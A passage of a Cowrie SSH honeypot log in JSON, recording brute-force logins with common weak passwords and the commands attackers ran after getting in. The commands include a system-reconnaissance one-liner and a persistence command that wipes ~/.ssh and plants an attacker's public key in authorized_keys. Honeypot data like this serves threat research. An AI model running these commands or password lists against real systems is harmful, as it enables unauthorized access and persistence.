0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:02:36.188132Z","src_ip":"212.227.125.160","session":"d66fab5c0710"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev12#$","message":"login attempt [dev/dev12#$] failed","sensor":"my-vps","timestamp":"2025-08-31T05:02:36.816065Z","src_ip":"212.227.235.229","session":"d268af0a57eb"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:38.092664Z","src_ip":"212.227.235.229","session":"d268af0a57eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53358,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfffa302df37","protocol":"ssh","message":"New connection: 212.227.235.229:53358 (1.2.3.4:22) [session: dfffa302df37]","sensor":"my-vps","timestamp":"2025-08-31T05:02:41.524580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:02:42.283090Z","src_ip":"212.227.235.229","session":"dfffa302df37"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:02:42.283827Z","src_ip":"212.227.235.229","session":"dfffa302df37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43410,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b056bf87658","protocol":"ssh","message":"New connection: 212.227.235.229:43410 (1.2.3.4:22) [session: 1b056bf87658]","sensor":"my-vps","timestamp":"2025-08-31T05:02:47.369395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:02:47.370391Z","src_ip":"212.227.235.229","session":"1b056bf87658"}
{"eventid":"cowrie.login.success","username":"root","password":"welcome","message":"login attempt [root/welcome] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:02:47.922504Z","src_ip":"212.227.235.229","session":"dfffa302df37"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:02:48.389403Z","src_ip":"212.227.235.229","session":"1b056bf87658"}
{"eventid":"cowrie.login.success","username":"root","password":"Sq123456@","message":"login attempt [root/Sq123456@] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:02:49.516362Z","src_ip":"212.227.235.229","session":"1b056bf87658"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:02:50.156305Z","src_ip":"212.227.235.229","session":"dfffa302df37"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T05:02:50.156991Z","src_ip":"212.227.235.229","session":"dfffa302df37"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:02:50.157667Z","src_ip":"212.227.235.229","session":"dfffa302df37"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:02:50.158776Z","src_ip":"212.227.235.229","session":"dfffa302df37"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T05:02:50.160288Z","src_ip":"212.227.235.229","session":"dfffa302df37"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:02:50.161350Z","src_ip":"212.227.235.229","session":"dfffa302df37"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:02:50.162504Z","src_ip":"212.227.235.229","session":"dfffa302df37"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T05:02:50.164065Z","src_ip":"212.227.235.229","session":"dfffa302df37"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T05:02:50.164658Z","src_ip":"212.227.235.229","session":"dfffa302df37"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:02:50.165251Z","src_ip":"212.227.235.229","session":"dfffa302df37"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:02:50.165885Z","src_ip":"212.227.235.229","session":"dfffa302df37"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:02:50.166541Z","src_ip":"212.227.235.229","session":"dfffa302df37"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:02:50.167200Z","src_ip":"212.227.235.229","session":"dfffa302df37"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:02:50.457183Z","src_ip":"212.227.235.229","session":"1b056bf87658"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:02:50.457840Z","src_ip":"212.227.235.229","session":"1b056bf87658"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:02:50.458998Z","src_ip":"212.227.235.229","session":"1b056bf87658"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:50.730416Z","src_ip":"212.227.235.229","session":"1b056bf87658"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T05:02:50.929154Z","src_ip":"212.227.235.229","session":"dfffa302df37"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:50.930052Z","src_ip":"212.227.235.229","session":"dfffa302df37"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:50.931094Z","src_ip":"212.227.235.229","session":"dfffa302df37"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:02:51.331882Z","src_ip":"212.227.235.229","session":"1b056bf87658"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:02:51.332644Z","src_ip":"212.227.235.229","session":"1b056bf87658"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:02:51.606286Z","src_ip":"212.227.235.229","session":"1b056bf87658"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:51.607148Z","src_ip":"212.227.235.229","session":"1b056bf87658"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46652,"dst_ip":"1.2.3.4","dst_port":22,"session":"99c1a4bd6f14","protocol":"ssh","message":"New connection: 212.227.235.229:46652 (1.2.3.4:22) [session: 99c1a4bd6f14]","sensor":"my-vps","timestamp":"2025-08-31T05:02:51.877913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:02:51.878818Z","src_ip":"212.227.235.229","session":"99c1a4bd6f14"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:02:52.151252Z","src_ip":"212.227.235.229","session":"99c1a4bd6f14"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:02:53.284569Z","src_ip":"212.227.235.229","session":"99c1a4bd6f14"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:55.207216Z","src_ip":"212.227.235.229","session":"99c1a4bd6f14"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46668,"dst_ip":"1.2.3.4","dst_port":22,"session":"05beb77d0426","protocol":"ssh","message":"New connection: 212.227.235.229:46668 (1.2.3.4:22) [session: 05beb77d0426]","sensor":"my-vps","timestamp":"2025-08-31T05:02:55.475613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:02:55.476507Z","src_ip":"212.227.235.229","session":"05beb77d0426"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:02:55.745333Z","src_ip":"212.227.235.229","session":"05beb77d0426"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:02:56.861853Z","src_ip":"212.227.235.229","session":"05beb77d0426"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:57.132248Z","src_ip":"212.227.235.229","session":"05beb77d0426"}
{"eventid":"cowrie.session.closed","duration":"9.8","message":"Connection lost after 9.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:57.133168Z","src_ip":"212.227.235.229","session":"1b056bf87658"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42114,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffab376f54e8","protocol":"ssh","message":"New connection: 212.227.235.229:42114 (1.2.3.4:22) [session: ffab376f54e8]","sensor":"my-vps","timestamp":"2025-08-31T05:02:59.965226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:02:59.967151Z","src_ip":"212.227.235.229","session":"ffab376f54e8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:03:00.048161Z","src_ip":"212.227.235.229","session":"ffab376f54e8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Qwer1234!@#$","message":"login attempt [admin/Qwer1234!@#$] failed","sensor":"my-vps","timestamp":"2025-08-31T05:03:00.374522Z","src_ip":"212.227.235.229","session":"ffab376f54e8"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:01.458818Z","src_ip":"212.227.235.229","session":"ffab376f54e8"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx","message":"login attempt [root/!QAZ2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:03:01.835947Z","src_ip":"212.227.125.160","session":"d66fab5c0710"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48644,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6f10da7f858","protocol":"ssh","message":"New connection: 212.227.235.229:48644 (1.2.3.4:22) [session: a6f10da7f858]","sensor":"my-vps","timestamp":"2025-08-31T05:03:02.701131Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42638,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba9b03cb417b","protocol":"ssh","message":"New connection: 212.227.125.160:42638 (1.2.3.4:22) [session: ba9b03cb417b]","sensor":"my-vps","timestamp":"2025-08-31T05:03:02.719321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:03:03.201490Z","src_ip":"212.227.125.160","session":"ba9b03cb417b"}
